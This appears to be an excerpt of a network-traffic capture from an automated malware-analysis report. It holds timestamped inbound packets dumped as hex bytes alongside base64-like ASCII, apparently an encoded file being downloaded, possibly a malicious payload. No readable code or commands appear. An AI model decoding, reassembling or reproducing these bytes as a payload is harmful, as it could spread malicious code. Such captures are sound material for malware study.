zC2P3jeP8bvIWBk+0KwK2IzWQgK5bOqQP6LELbna1qQAVYE4g82b/WCUj5j2zdwwy5ZW2bHAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsAAFsA
2023-03-02 16:18:25 UTC	34	IN	Data Raw: 63 4c 78 68 4f 6a 6e 4e 4d 32 51 64 58 33 6f 71 5a 2b 6d 44 63 33 6e 42 42 5a 72 31 37 41 35 78 75 38 6e 59 45 4c 37 2f 70 49 70 61 6a 66 42 6f 31 4d 4e 69 31 43 63 41 70 2b 58 4a 59 67 37 6e 39 63 4e 33 6c 6f 41 2f 71 6f 43 35 7a 6c 38 38 4f 45 36 4d 74 48 54 47 57 68 61 5a 70 58 54 34 61 69 71 2f 74 75 4d 48 49 6d 61 70 55 61 44 4f 71 52 79 62 74 75 55 77 76 44 58 4f 6b 61 44 33 39 53 39 2f 74 4e 6b 4e 39 48 36 56 67 44 68 45 59 79 4f 47 5a 4d 58 51 6f 4e 70 35 41 47 38 57 6a 79 58 30 5a 31 4d 6e 70 52 76 49 4a 47 6f 7a 6c 4e 47 46 4d 49 50 6b 66 58 54 67 4d 5a 76 78 77 42 43 6c 69 5a 6b 4b 57 56 74 42 72 6b 66 33 36 7a 48 55 5a 6b 34 51 37 73 43 6a 6e 49 79 57 47 5a 4f 2f 44 4e 6b 78 32 6b 4c 33 35 44 31 2f 53 35 47 6d 47 49 4e 44 42 6e 62 6a 33 73 52 Data Ascii: cLxhOjnNM2QdX3oqZ+mDc3nBBZr17A5xu8nYEL7/pIpajfBo1MNi1CcAp+XJYg7n9cN3loA/qoC5zl88OE6MtHTGWhaZpXT4aiq/tuMHImapUaDOqRybtuUwvDXOkaD39S9/tNkN9H6VgDhEYyOGZMXQoNp5AG8WjyX0Z1MnpRvIJGozlNGFMIPkfXTgMZvxwBCliZkKWVtBrkf36zHUZk4Q7sCjnIyWGZO/DNkx2kL35D1/S5GmGINDBnbj3sR
2023-03-02 16:18:25 UTC	36	IN	Data Raw: 46 38 64 73 71 4a 43 37 39 65 4b 62 38 72 48 4d 64 74 53 34 77 65 73 66 54 48 6f 62 6b 4a 79 53 7a 76 47 52 6b 56 2b 62 4a 75 4e 53 54 46 34 4b 48 79 34 63 2b 69 74 5a 57 58 6e 2f 75 63 6f 4b 39 34 32 31 2b 42 64 6a 53 6f 2f 6e 78 32 4c 6f 55 47 55 55 75 39 61 4f 5a 62 51 44 6d 69 7a 53 4e 75 58 2b 50 75 72 46 30 61 59 69 67 36 4a 71 39 75 58 54 77 6d 72 4b 45 61 6f 6c 77 30 43 53 74 4e 2f 4a 45 49 72 5a 70 36 57 37 38 72 48 61 56 72 74 6b 6b 6e 62 70 49 64 70 57 32 5a 4f 31 4f 70 6e 78 32 6d 57 6b 49 44 59 31 75 37 71 52 79 33 43 4e 50 5a 38 2b 77 41 5a 4c 47 56 4d 34 49 30 78 54 4e 54 71 5a 38 64 70 73 6a 6d 44 61 31 71 4f 6d 44 6c 61 5a 67 75 5a 44 79 5a 75 41 5a 56 4d 7a 6d 77 68 79 62 71 61 65 55 63 75 30 30 47 78 33 59 46 58 5a 38 64 70 43 39 2b 54 Data Ascii: F8dsqJC79eKb8rHMdtS4wesfTHobkJySzvGRkV+bJuNSTF4KHy4c+itZWXn/ucoK9421+BdjSo/nx2LoUGUUu9aOZbQDmizSNuX+PurF0aYig6Jq9uXTwmrKEaolw0CStN/JEIrZp6W78rHaVrtkknbpIdpW2ZO1Opnx2mWkIDY1u7qRy3CNPZ8+wAZLGVM4I0xTNTqZ8dpsjmDa1qOmDlaZguZDyZuAZVMzmwhybqaeUcu00Gx3YFXZ8dpC9+T
2023-03-02 16:18:25 UTC	37	IN	Data Raw: 39 64 65 55 43 61 32 2b 7a 73 6b 4f 39 57 7a 76 62 6c 62 72 6b 53 70 55 6c 34 37 57 4a 4d 6e 6f 65 70 6d 62 75 55 63 6f 6d 63 50 36 70 70 6b 6c 34 47 74 55 4d 56 70 59 70 75 68 72 68 35 75 4f 57 6c 61 37 31 4b 39 57 32 62 48 37 49 76 76 42 65 6d 6d 59 35 58 69 7a 37 4c 47 61 56 72 69 46 41 46 4c 32 78 52 42 32 70 6c 44 67 6e 4c 7a 41 73 4a 6e 37 43 45 67 38 75 71 66 6d 6e 74 46 33 46 32 7a 6f 53 33 70 6d 76 4d 43 77 6d 66 73 49 53 44 79 36 70 2b 61 65 30 58 63 58 62 4f 68 4c 65 6d 61 35 2f 4e 4e 76 35 74 63 47 4e 74 53 34 36 74 5a 77 44 66 6f 64 6b 4c 78 57 72 54 50 4c 78 30 4f 5a 4d 66 67 31 79 6a 46 61 56 6f 30 4c 46 42 39 72 65 57 79 71 67 6b 32 51 46 45 44 6b 61 39 6f 7a 45 4d 59 38 4a 75 41 32 53 6e 45 30 4a 58 58 38 66 41 7a 70 59 54 67 6f 6e 69 39 Data Ascii: 9deUCa2+zskO9WzvblbrkSpUl47WJMnoepmbuUcomcP6ppkl4GtUMVpYpuhrh5uOWla71K9W2bH7IvvBemmY5Xiz7LGaVriFAFL2xRB2plDgnLzAsJn7CEg8uqfmntF3F2zoS3pmvMCwmfsISDy6p+ae0XcXbOhLema5/NNv5tcGNtS46tZwDfodkLxWrTPLx0OZMfg1yjFaVo0LFB9reWyqgk2QFEDka9ozEMY8JuA2SnE0JXX8fAzpYTgoni9
2023-03-02 16:18:25 UTC	38	IN	Data Raw: 39 46 31 56 4f 4d 64 36 47 6a 66 79 71 6e 6e 41 45 4b 72 50 4f 4d 65 36 47 6a 77 30 6a 39 30 34 78 62 6f 61 4d 43 42 6d 43 50 6e 50 5a 59 59 57 64 48 70 6f 4f 74 4f 33 4b 52 6e 78 32 6e 6b 44 34 53 4e 6b 75 63 70 77 69 48 73 61 2b 69 30 57 2b 43 58 63 4f 63 78 37 50 6f 39 4e 6d 69 6f 37 58 4b 58 57 32 62 48 72 6c 6a 6f 57 55 2b 6b 35 2f 57 38 34 70 57 65 37 59 76 6a 48 75 68 6f 56 55 67 6b 67 2b 49 68 36 46 69 4b 6b 4c 69 6d 41 50 36 7a 30 39 50 5a 61 31 70 6d 65 55 6f 68 4a 62 2f 6f 72 50 42 49 6d 31 64 66 48 51 2f 66 76 55 61 48 48 6e 49 69 59 39 36 5a 52 70 38 76 68 67 73 44 5a 6c 44 47 6d 39 48 54 32 57 74 61 5a 6a 43 72 42 6b 36 38 64 4e 2b 75 41 47 74 36 68 57 34 4b 50 4f 4d 4d 36 48 44 4d 5a 58 4d 59 35 38 56 57 30 4c 31 31 44 39 2b 6d 52 6c 73 4b Data Ascii: 9F1VOMd6GjfyqnnAEKrPOMe6Gjw0j904xboaMCBmCPnPZYYWdHpoOtO3KRnx2nkD4SNkucpwiHsa+i0W+CXcOcx7Po9Nmio7XKXW2bHrljoWU+k5/W84pWe7YvjHuhoVUgkg+Ih6FiKkLimAP6z09PZa1pmeUohJb/orPBIm1dfHQ/fvUaHHnIiY96ZRp8vhgsDZlDGm9HT2WtaZjCrBk68dN+uAGt6hW4KPOMM6HDMZXMY58VW0L11D9+mRlsK
2023-03-02 16:18:25 UTC	39	IN	Data Raw: 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 Data Ascii: ABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABb
2023-03-02 16:18:25 UTC	40	IN	Data Raw: 4a 44 74 53 76 52 62 5a 73 63 50 33 36 77 41 61 33 6d 57 37 6a 7a 62 56 4e 63 4c 71 33 56 44 6e 39 74 6b 48 6e 76 6f 6a 76 36 69 32 31 51 5a 49 54 72 52 52 71 73 55 67 71 56 71 32 34 79 4e 6a 54 68 6c 41 47 74 45 6a 32 46 58 72 4b 4a 55 37 5a 50 6e 78 63 36 55 55 48 6a 6f 61 4d 6d 76 2f 2b 66 6e 39 51 34 41 66 74 2f 6f 6d 44 35 45 70 31 2f 6e 4c 54 33 5a 71 4d 4b 75 57 50 63 74 47 4b 76 6e 37 63 7a 6b 46 52 4c 6f 63 43 36 50 57 47 44 6e 39 63 36 33 36 65 6a 67 37 30 6e 46 61 56 72 59 67 50 74 6e 39 30 61 66 57 72 59 77 36 74 75 67 37 50 41 30 64 55 61 48 4e 4c 33 2f 54 31 75 55 54 4e 78 31 5a 4d 64 70 33 72 59 41 61 7a 58 51 7a 68 37 61 6d 36 2f 6f 61 48 34 6d 54 34 66 6e 39 56 4c 58 63 4b 48 6f 61 41 6f 4c 74 4c 41 41 2f 71 76 65 6d 55 61 72 64 57 66 42 Data Ascii: JDtSvRbZscP36wAa3mW7jzbVNcLq3VDn9tkHnvojv6i21QZITrRRqsUgqVq24yNjThlAGtEj2FXrKJU7ZPnxc6UUHjoaMmv/+fn9Q4Aft/omD5Ep1/nLT3ZqMKuWPctGKvn7czkFRLocC6PWGDn9c636ejg70nFaVrYgPtn90afWrYw6tug7PA0dUaHNL3/T1uUTNx1ZMdp3rYAazXQzh7am6/oaH4mT4fn9VLXcKHoaAoLtLAA/qvemUardWfB
2023-03-02 16:18:25 UTC	42	IN	Data Raw: 65 64 58 35 32 6f 51 57 47 62 48 64 34 62 41 2b 43 75 6c 36 37 35 72 57 6d 61 79 6e 68 6a 6a 42 36 35 59 6e 71 55 2b 61 2b 66 31 6a 57 42 74 64 5a 2b 65 35 45 5a 72 70 79 7a 51 43 54 7a 6a 44 2b 68 6f 36 50 68 77 78 41 44 2b 6f 5a 33 6a 79 47 74 61 5a 69 52 4a 79 37 52 47 33 46 56 6b 78 32 6b 77 59 61 37 51 32 70 6e 4a 36 4f 39 70 78 57 6c 61 57 73 69 7a 61 77 44 2b 71 39 76 54 79 47 74 61 5a 6e 46 42 65 44 7a 2f 6c 52 69 5a 53 6d 5a 59 5a 73 63 63 72 53 52 43 75 4a 31 6b 64 69 51 72 43 30 5a 44 71 35 4e 69 51 47 4b 6c 52 6c 73 36 67 35 38 55 33 36 57 68 37 4a 48 6e 39 58 62 2b 49 42 54 73 6d 4f 39 79 50 6c 68 6d 78 39 66 5a 62 31 64 75 72 4b 55 69 36 4c 51 76 52 42 2b 79 35 7a 45 31 50 76 61 70 44 39 2b 6c 52 70 38 34 68 45 34 59 33 71 33 47 6d 39 48 54 Data Ascii: edX52oQWGbHd4bA+Cul675rWmaynhjjB65YnqU+a+f1jWBtdZ+e5EZrpyzQCTzjD+ho6PhwxAD+oZ3jyGtaZiRJy7RG3FVkx2kwYa7Q2pnJ6O9pxWlaWsizawD+q9vTyGtaZnFBeDz/lRiZSmZYZsccrSRCuJ1kdiQrC0ZDq5NiQGKlRls6g58U36Wh7JHn9Xb+IBTsmO9yPlhmx9fZb1durKUi6LQvRB+y5zE1PvapD9+lRp84hE4Y3q3Gm9HT
2023-03-02 16:18:25 UTC	43	IN	Data Raw: 41 42 62 41 41 42 62 41 41 42 62 41 4f 32 32 41 45 4b 79 6e 65 4f 6f 61 31 70 6d 6c 6d 62 2f 39 30 62 63 4e 57 54 48 61 59 75 7a 63 64 77 38 58 78 62 6f 37 77 6e 46 61 56 72 61 44 50 50 66 35 32 6f 47 57 47 62 48 55 45 76 76 5a 69 6d 6c 36 36 68 72 57 6d 61 79 6e 68 6f 47 6f 64 63 59 51 4b 48 6f 70 43 54 68 5a 74 2b 78 34 32 74 61 42 77 42 70 62 49 67 47 51 4e 74 57 73 49 6b 64 63 55 5a 5a 65 74 65 4c 48 64 2b 75 52 6c 6d 6a 6b 58 62 48 30 39 73 50 61 46 70 6d 6f 56 43 62 32 57 6b 70 61 6a 6d 68 37 49 50 6e 4d 43 52 36 64 36 70 52 74 75 63 77 75 6d 69 45 32 65 69 74 55 70 57 71 64 75 49 57 61 4b 4c 74 65 71 46 62 5a 73 63 50 32 35 79 6b 63 35 31 6d 31 53 6f 61 4b 30 5a 5a 6f 76 6a 41 37 64 2b 2b 6f 65 79 44 35 2f 63 51 42 41 4b 30 56 4c 4e 77 56 41 33 66 Data Ascii: ABbAABbAABbAO22AEKyneOoa1pmlmb/90bcNWTHaYuzcdw8Xxbo7wnFaVraDPPf52oGWGbHUEvvZiml66hrWmaynhoGodcYQKHopCThZt+x42taBwBpbIgGQNtWsIkdcUZZeteLHd+uRlmjkXbH09sPaFpmoVCb2Wkpajmh7IPnMCR6d6pRtucwumiE2eitUpWqduIWaKLteqFbZscP25ykc51m1SoaK0ZZovjA7d++oeyD5/cQBAK0VLNwVA3f
2023-03-02 16:18:25 UTC	44	IN	Data Raw: 32 62 48 38 33 58 43 51 4c 43 4b 34 6a 72 70 70 50 69 48 6c 74 65 48 78 6d 6c 61 45 7a 4d 70 6e 57 62 51 74 78 36 63 51 71 44 62 56 71 59 62 5a 4d 71 68 55 49 4c 6e 78 38 68 2f 46 73 7a 6f 61 70 45 46 74 6d 33 69 4d 61 37 66 6f 63 5a 70 57 72 58 51 34 35 62 6a 46 4f 32 38 35 33 4b 75 57 32 62 48 6d 4b 38 75 77 75 32 2f 34 78 2f 6f 33 36 48 47 61 56 6f 34 54 7a 31 6b 35 32 71 75 57 32 62 48 46 44 42 78 7a 2b 79 44 4a 6a 6a 6b 6e 57 66 48 61 53 2b 54 68 2b 32 6d 6f 63 65 31 31 6d 2b 2b 36 47 70 70 64 6e 73 2b 34 77 66 6f 61 6a 70 61 61 39 2b 51 41 41 2f 66 72 45 5a 5a 69 37 39 69 6a 61 79 6c 57 6c 47 4c 6f 55 4a 30 57 47 62 48 62 4f 43 58 37 65 6a 76 65 38 56 70 57 75 33 39 62 35 78 66 42 65 6a 76 65 38 56 70 57 75 68 6b 43 44 73 41 6c 67 2f 6a 49 34 59 50 Data Ascii: 2bH83XCQLCK4jrppPiHlteHxmlaEzMpnWbQtx6cQqDbVqYbZMqhUILnx8h/FszoapEFtm3iMa7focZpWrXQ45bjFO2853KuW2bHmK8uwu2/4x/o36HGaVo4Tz1k52quW2bHFDBxz+yDJjjknWfHaS+Th+2moce11m++6Gppdns+4wfoajpaa9+QAA/frEZZi79ijaylWlGLoUJ0WGbHbOCX7ejve8VpWu39b5xfBejve8VpWuhkCDsAlg/jI4YP
2023-03-02 16:18:25 UTC	45	IN	Data Raw: 47 64 6e 31 75 79 5a 35 2f 63 4b 7a 30 56 34 37 62 7a 6e 37 77 50 62 4a 58 76 73 67 65 59 34 32 6c 39 7a 66 50 4a 63 53 39 62 53 77 57 44 2f 6f 5a 31 6d 55 6b 78 57 43 2f 36 34 32 32 5a 4b 2b 44 61 57 52 6c 6d 59 42 31 79 57 59 36 35 47 57 61 4b 5a 73 74 42 69 67 2f 2b 72 33 72 63 41 37 49 6c 6e 78 32 6d 69 4d 31 76 4b 50 4f 4d 47 36 50 65 31 78 6d 6c 61 68 41 4c 67 56 4a 45 45 5a 35 66 38 32 75 6a 76 74 63 5a 70 57 71 2b 2f 47 4e 37 6e 61 72 70 62 5a 73 65 31 73 67 58 57 36 61 53 35 51 71 41 61 6d 55 71 36 57 32 62 48 48 4b 38 41 2f 72 45 61 34 6a 6b 50 32 35 2f 50 47 35 31 6d 73 43 43 58 46 71 48 6f 70 55 39 57 36 47 72 6b 77 59 75 70 35 2f 65 68 57 4f 44 30 55 59 76 6e 39 7a 42 59 31 37 4c 74 67 77 44 2b 6f 54 7a 6a 42 61 37 66 2b 63 5a 70 57 67 4a 33 Data Ascii: Gdn1uyZ5/cKz0V47bzn7wPbJXvsgeY42l9zfPJcS9bSwWD/oZ1mUkxWC/6422ZK+DaWRlmYB1yWY65GWaKZstBig/+r3rcA7Ilnx2miM1vKPOMG6Pe1xmlahALgVJEEZ5f82ujvtcZpWq+/GN7narpbZse1sgXW6aS5QqAamUq6W2bHHK8A/rEa4jkP25/PG51msCCXFqHopU9W6GrkwYup5/ehWOD0UYvn9zBY17LtgwD+oTzjBa7f+cZpWgJ3
2023-03-02 16:18:25 UTC	47	IN	Data Raw: 59 6f 38 34 77 7a 6f 61 6e 6a 68 78 4f 6c 6a 46 6d 48 31 59 65 71 6b 55 73 6e 41 37 4a 75 68 78 77 6e 66 44 63 51 50 59 36 52 47 51 64 4e 68 70 4b 50 65 76 6b 5a 70 50 64 77 73 75 39 71 59 6b 4f 68 71 47 47 6d 46 4b 6c 38 58 72 74 38 63 78 57 6c 61 51 76 72 6e 77 2b 64 79 45 31 68 6d 78 38 77 58 4f 51 33 74 76 65 64 79 45 31 68 6d 78 78 59 39 78 67 54 6f 33 78 7a 46 61 56 70 6a 4c 2b 63 31 41 50 36 34 47 70 6c 4b 45 31 68 6d 78 78 79 75 58 77 55 70 33 70 4d 41 61 65 6e 30 31 38 33 65 69 55 5a 5a 7a 79 36 39 56 4e 74 57 47 31 78 74 4d 66 2b 58 32 32 5a 2b 4d 61 5a 7a 77 70 46 34 79 63 64 45 72 6b 52 6f 61 5a 31 6d 52 2f 67 62 32 36 48 73 6b 2b 4d 58 36 47 70 70 4a 47 54 48 58 77 58 6f 61 6a 46 58 48 51 6b 41 2f 72 6e 62 56 6d 47 4b 46 6d 34 41 37 46 74 6b Data Ascii: Yo84wzoanjhxOljFmH1YeqkUsnA7JuhxwnfDcQPY6RGQdNhpKPevkZpPdwsu9qYkOhqGGmFKl8Xrt8cxWlaQvrnw+dyE1hmx8wXOQ3tvedyE1hmxxY9xgTo3xzFaVpjL+c1AP64GplKE1hmxxyuXwUp3pMAaen0183eiUZZzy69VNtWG1xtMf+X22Z+MaZzwpF4ycdErkRoaZ1mR/gb26Hsk+MX6GppJGTHXwXoajFXHQkA/rnbVmGKFm4A7Ftk
2023-03-02 16:18:25 UTC	48	IN	Data Raw: 63 59 47 76 6c 34 64 36 47 72 71 56 6f 52 77 35 2f 66 49 74 50 45 41 62 4e 42 76 34 6d 46 33 34 4d 35 4d 55 75 63 2b 4c 4c 4a 59 65 4b 35 61 64 50 56 53 6b 4f 66 76 6a 4e 6a 73 64 75 68 71 2f 34 51 43 42 4f 4d 4f 36 47 71 41 37 72 49 63 41 47 37 4e 48 2b 39 36 58 56 68 6d 78 35 2b 62 2b 58 67 57 73 67 50 7a 44 39 75 59 67 70 4c 62 6b 65 6f 79 67 43 68 47 6e 70 71 46 51 76 71 74 70 4a 72 36 7a 57 4a 47 68 74 51 32 2f 59 41 38 34 77 78 6f 6f 75 31 36 58 56 68 6d 78 77 2f 66 76 30 4b 35 6d 65 32 54 54 56 34 41 51 71 4f 64 5a 4b 61 53 4e 45 6c 47 57 79 77 69 32 46 4c 62 56 4e 54 71 36 78 44 2f 75 4e 74 6b 77 36 31 6c 2b 77 44 73 43 47 54 48 61 61 4c 56 4e 38 66 65 74 57 35 45 33 4f 76 44 36 50 63 30 78 57 6c 61 78 52 55 57 37 4f 64 71 4f 31 68 6d 78 33 73 65 Data Ascii: cYGvl4d6GrqVoRw5/fItPEAbNBv4mF34M5MUuc+LLJYeK5adPVSkOfvjNjsduhq/4QCBOMO6GqA7rIcAG7NH+96XVhmx5+b+XgWsgPzD9uYgpLbkeoygChGnpqFQvqtpJr6zWJGhtQ2/YA84wxoou16XVhmxw/fv0K5me2TTV4AQqOdZKaSNElGWywi2FLbVNTq6xD/uNtkw61l+wDsCGTHaaLVN8fetW5E3OvD6Pc0xWlaxRUW7OdqO1hmx3se
2023-03-02 16:18:25 UTC	49	IN	Data Raw: 31 34 48 50 4e 2b 39 52 6c 71 77 55 64 49 59 50 4f 4d 65 36 47 6b 6f 76 61 54 42 41 45 4b 79 32 31 55 45 48 57 4f 69 70 39 6f 46 35 6a 77 32 56 65 50 32 4f 31 68 6d 70 75 32 33 37 33 49 34 57 47 62 48 31 38 53 42 56 74 47 6d 34 67 2f 6f 72 43 4e 68 73 6e 44 6e 4d 59 4c 39 53 47 66 6f 6e 4c 4c 65 38 70 64 6e 4e 4f 4c 76 4e Data Ascii: 14HPN+9RlqwUdIYPOMe6GkovaTBAEKy21UEHWOip9oF5jw2VeP2O1hmpu2373I4WGbH18SBVtGm4g/orCNhsnDnMYL9SGfonLLe8pdnNOLvN
2023-03-02 16:18:25 UTC	49	IN	Data Raw: 38 56 70 57 6c 34 67 72 6c 6d 77 42 6e 6e 6f 41 50 36 6a 32 31 57 70 30 36 64 66 30 58 36 78 52 56 6a 32 66 44 5a 4b 63 53 4a 31 54 6f 68 48 68 42 4c 65 53 47 57 30 53 67 49 54 70 66 4b 30 6c 5a 6f 4e 79 57 35 75 55 74 4a 4f 67 4d 2b 55 35 38 53 72 65 6b 7a 4e 55 61 33 6e 39 4c 4a 61 4f 79 77 50 33 36 30 41 37 45 39 6b 78 32 6b 73 63 34 42 65 33 70 74 44 71 64 76 4c 30 6d 74 61 5a 72 53 4c 67 7a 42 47 78 45 39 6b 78 32 6d 67 4b 53 48 65 32 39 50 53 61 31 70 6d 7a 59 72 63 54 6f 53 57 31 33 50 46 61 56 6f 54 4d 43 72 66 70 41 42 71 5a 7a 6f 39 33 6a 78 66 48 2b 68 70 6c 35 48 32 66 4a 45 46 71 2f 78 79 48 65 68 5a 33 78 74 7a 65 46 38 4e 36 47 6b 4f 4e 70 41 45 34 68 58 67 37 30 37 46 61 56 70 66 46 39 66 37 45 4c 34 6c 72 4b 4d 57 36 4b 77 70 4d 45 68 4c Data Ascii: 8VpWl4grlmwBnnoAP6j21Wp06df0X6xRVj2fDZKcSJ1TohHhBLeSGW0SgITpfK0lZoNyW5uUtJOgM+U58SrekzNUa3n9LJaOywP360A7E9kx2ksc4Be3ptDqdvL0mtaZrSLgzBGxE9kx2mgKSHe29PSa1pmzYrcToSW13PFaVoTMCrfpABqZzo93jxfH+hpl5H2fJEFq/xyHehZ3xtzeF8N6GkONpAE4hXg707FaVpfF9f7EL4lrKMW6KwpMEhL
2023-03-02 16:18:25 UTC	50	IN	Data Raw: 4f 46 4c 62 4f 46 54 48 69 78 62 70 55 7a 73 65 57 54 48 61 54 7a 6a 48 71 35 5a 2b 66 34 33 4e 67 42 43 75 4e 74 56 68 72 59 79 47 45 5a 61 67 51 49 78 33 4e 74 6c 79 6e 48 37 4b 36 47 65 6e 4e 43 62 37 5a 47 68 51 68 64 62 5a 73 66 31 7a 6d 2f 78 37 61 33 6e 63 68 64 62 5a 73 65 6c 6c 4a 4b 6c 36 4f 38 59 78 6d 6c 61 69 4c 2f 36 4f 75 64 79 46 31 74 6d 78 39 52 34 43 50 4f 66 6e 4d 43 45 6c 74 63 59 78 6d 6c 61 45 7a 41 71 6e 57 58 63 30 32 34 75 52 6d 6f 64 2f 68 72 4c 32 31 55 2f 59 72 62 73 6f 65 79 54 35 38 52 74 45 36 77 6a 55 49 50 6e 42 47 64 57 62 4d 66 6f 73 57 7a 4c 59 31 71 68 78 4c 47 4d 72 37 72 6f 61 51 53 62 39 49 70 65 42 75 68 70 70 78 71 4c 32 41 44 2b 73 64 36 6d 52 6c 72 4c 49 56 34 51 30 39 74 6a 61 46 70 6d 65 4c 4f 64 30 52 66 6f Data Ascii: OFLbOFTHixbpUzseWTHaTzjHq5Z+f43NgBCuNtVhrYyGEZagQIx3NtlynH7K6GenNCb7ZGhQhdbZsf1zm/x7a3nchdbZsellJKl6O8YxmlaiL/6OudyF1tmx9R4CPOfnMCEltcYxmlaEzAqnWXc024uRmod/hrL21U/YrbsoeyT58RtE6wjUIPnBGdWbMfosWzLY1qhxLGMr7roaQSb9IpeBuhppxqL2AD+sd6mRlrLIV4Q09tjaFpmeLOd0Rfo
2023-03-02 16:18:25 UTC	52	IN	Data Raw: 41 44 32 70 39 32 6f 35 6a 75 62 56 65 50 38 44 6c 70 6d 70 69 71 6c 36 36 35 72 57 6d 61 79 6e 6d 4b 2f 68 4b 35 5a 59 50 71 61 41 51 42 43 73 4e 74 56 41 4a 53 33 76 71 48 73 6d 67 41 77 72 2b 77 35 52 6c 70 4e 34 33 6d 70 33 36 39 47 57 6f 4d 31 75 77 78 69 69 51 44 73 49 47 54 48 61 61 7a 70 56 58 52 6a 70 55 62 63 49 47 54 48 61 56 6c 73 4c 66 66 62 79 37 31 72 57 6d 61 34 58 46 32 2b 52 75 77 67 5a 4d 64 70 31 38 6c 4a 50 64 2b 76 6f 65 69 6a 33 35 34 71 70 65 75 39 61 31 70 6d 73 70 34 5a 76 78 65 75 57 59 30 43 45 38 68 65 4d 2b 68 70 69 7a 78 58 6c 46 38 46 44 32 4f 2f 52 6c 70 65 71 63 7a 78 50 4f 4d 65 55 49 4c 6e 78 4a 67 6a 6f 64 57 75 33 39 72 47 61 56 6f 39 4d 32 62 6c 35 33 4c 56 57 32 62 48 51 2b 49 45 55 4f 6a 76 32 73 5a 70 57 6c 38 39 Data Ascii: AD2p92o5jubVeP8Dlpmpiql665rWmaynmK/hK5ZYPqaAQBCsNtVAJS3vqHsmgAwr+w5RlpN43mp369GWoM1uwxiiQDsIGTHaazpVXRjpUbcIGTHaVlsLffby71rWma4XF2+RuwgZMdp18lJPd+voeij354qpeu9a1pmsp4ZvxeuWY0CE8heM+hpizxXlF8FD2O/RlpeqczxPOMeUILnxJgjodWu39rGaVo9M2bl53LVW2bHQ+IEUOjv2sZpWl89
2023-03-02 16:18:25 UTC	53	IN	Data Raw: 77 2f 66 72 41 44 73 6f 6d 66 48 61 51 65 38 52 7a 49 38 34 78 58 6f 39 35 37 47 61 56 72 68 4a 73 65 69 35 33 4b 52 57 32 62 48 77 2b 6f 78 58 2b 6a 33 6e 73 5a 70 57 68 2b 50 37 36 44 69 4d 53 71 6c 36 7a 39 6f 57 6d 61 79 6e 68 6c 66 44 61 35 5a 56 57 71 53 79 77 42 43 75 39 36 75 52 6c 72 64 51 76 46 45 33 72 64 47 57 6a 4f 74 7a 67 62 65 69 55 5a 61 65 62 77 57 50 39 71 64 67 75 69 5a 6c 72 4f 52 55 2b 63 73 68 53 36 65 7a 71 35 5a 6f 4d 56 44 45 2b 49 4f 55 5a 6e 6e 39 47 30 32 43 56 68 51 67 75 66 73 4d 64 7a 49 4c 51 2f 66 76 30 5a 43 57 2f 61 32 74 4a 33 6a 74 47 74 61 5a 6b 36 31 34 30 75 68 55 4a 48 6e 51 68 70 59 5a 73 66 52 4a 47 41 73 55 59 72 6e 63 68 70 59 5a 73 64 46 6b 57 35 6e 36 50 63 56 78 57 6c 61 44 46 65 68 34 75 59 35 6a 52 6d 5a Data Ascii: w/frADsomfHaQe8RzI84xXo957GaVrhJsei53KRW2bHw+oxX+j3nsZpWh+P76DiMSql6z9oWmaynhlfDa5ZVWqSywBCu96uRlrdQvFE3rdGWjOtzgbeiUZaebwWP9qdguiZlrORU+cshS6ezq5ZoMVDE+IOUZnn9G02CVhQgufsMdzILQ/fv0ZCW/a2tJ3jtGtaZk6140uhUJHnQhpYZsfRJGAsUYrnchpYZsdFkW5n6PcVxWlaDFeh4uY5jRmZ
2023-03-02 16:18:25 UTC	54	IN	Data Raw: 79 77 66 69 52 66 45 72 6c 6b 54 4c 57 6c 75 35 2f 52 43 49 36 6e 64 55 49 50 6e 39 45 70 41 4e 50 76 70 70 50 35 47 57 6a 56 31 4f 34 37 65 69 6b 4b 71 30 2b 76 35 61 31 70 6d 66 6b 71 36 47 46 2f 73 69 4f 63 32 6b 6e 67 57 37 65 69 72 37 57 47 44 57 4f 63 32 50 6a 36 43 64 32 69 52 37 55 70 58 57 47 62 48 55 4a 41 41 4d 4b 6a 75 52 61 48 73 69 61 48 45 73 54 58 4a 77 4f 68 70 68 62 36 54 52 75 49 71 55 59 6e 6e 39 42 42 65 45 6f 34 50 59 37 39 47 51 76 34 4a 6e 32 4c 62 70 51 45 4c 71 32 42 47 67 70 67 45 4e 6d 2b 64 5a 55 39 2b 70 56 56 47 57 70 45 33 7a 2f 2f 62 56 63 67 54 42 76 69 68 37 49 48 69 44 65 68 70 77 4f 76 74 4e 77 5a 7a 34 64 71 61 54 32 62 66 4c 70 68 70 57 67 64 47 71 76 4a 34 43 57 33 62 6a 57 4e 33 6c 47 4a 47 6b 67 6c 72 59 75 59 38 Data Ascii: 